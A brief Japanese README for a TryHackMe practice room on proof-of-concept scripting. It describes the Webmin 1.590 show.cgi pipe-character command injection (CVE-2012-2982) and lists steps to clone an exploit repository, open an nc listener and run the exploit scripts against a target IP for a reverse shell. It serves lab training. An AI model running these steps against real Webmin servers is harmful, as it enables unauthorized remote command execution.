
Tryhackme の intro poc scripting ルームで POC スクリプティングを練習する(Linux 向け)
Webmin 1.590 以前の file/show.cgi には、リモートの認証済みユーザーがパス名内の不正な文字(例: | (パイプ) 文字)を介して任意のコマンドを実行できる脆弱性があります。
git clone https://github.com/CpyRe/CVE-2012-2982.gitpip3 install -r requirements.txtnc -nlvp <port>python3 exp.py <myip> <vulnip> <port>
または
python3 subprocess-exp.py <myip> <vulnip> <port>